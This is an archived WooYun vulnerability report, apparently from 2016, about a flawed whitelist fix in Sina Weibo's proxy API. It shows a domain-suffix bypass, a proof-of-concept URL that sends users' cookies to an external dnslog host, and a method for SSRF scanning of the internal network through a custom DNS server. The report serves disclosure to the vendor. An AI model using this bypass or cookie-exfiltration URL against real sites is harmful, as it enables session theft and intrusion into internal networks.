当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0191864

漏洞标题:新浪微博某漏洞修复不当可XSS/盗取用户httponly cookie

相关厂商:新浪微博

漏洞作者: loopx9

提交时间:2016-04-02 17:37

修复时间:2016-05-21 16:40

公开时间:2016-05-21 16:40

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-02: 细节已通知厂商并且等待厂商处理中
2016-04-06: 厂商已经确认,细节仅向厂商公开
2016-04-16: 细节向核心白帽子及相关领域专家公开
2016-04-26: 细节向普通白帽子公开
2016-05-06: 细节向实习白帽子公开
2016-05-21: 细节向公众公开

简要描述:

RT.

详细说明:

http://www.weibo.com/p/aj/proxy?api=url


见 @呆子不开口 之前发的 WooYun: 微博上你点我的链接我就可xss你并可拿到httponly的cookie及其他危害
官方修复了之后, http://contentrecommend.mobile.sina.cn@123.57.73.3/wb.php之类的url已经不行了,但使用http://contentrecommend.mobile.sina.cn.fakedomain.com 这样的url可以绕过白名单限制。
此处可以ssrf探测内网的,刚开始的时候还支持302跳转的,但测着测着就发现不行了,可能被发现然后修复了。虽然不能跳转了,但我们可以自己搭建个简易dns服务器,动态返回内网的ip,这样任可以扫描内网。

漏洞证明:

http://www.weibo.com/p/aj/proxy?api=http://contentrecommend.mobile.sina.cn.****.dnslog.info/


cloudeye 收到的请求:

1.png


cookies全送过来了。

修复方案:

完善白名单规则

版权声明:转载请注明来源 loopx9@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-04-06 16:32

厂商回复:

感谢关注新浪安全,问题修复中。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-04-02 17:41 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)

    出来利用新姿势了么?出来好多修复不当了

  2. 2016-04-02 17:44 | 随风的风 ( 普通白帽子 | Rank:244 漏洞数:91 | 微信公众号:233sec 不定期分享各种漏洞思...)

    关注。。

  3. 2016-04-02 18:08 | Mark0smith ( 普通白帽子 | Rank:162 漏洞数:65 | 我要是再正常一点就好了)

    66666

  4. 2016-04-02 18:23 | U神 ( 核心白帽子 | Rank:1360 漏洞数:150 | 乌云核心菜鸟,此号处于联盟托管中....)

    我擦。

  5. 2016-04-02 20:32 | 我叫金挖挖 ( 路人 | Rank:15 漏洞数:5 | 一个搞电力的业余玩家)

    捡漏也是一门学问

  6. 2016-04-02 23:00 | sqlfeng ( 普通白帽子 | Rank:591 漏洞数:75 | 慢慢来,不急)

    新浪最近漏洞高爆发啊

  7. 2016-04-02 23:44 | 牛肉包子 ( 普通白帽子 | Rank:307 漏洞数:70 | baozisec)

    默默关注loopx9师傅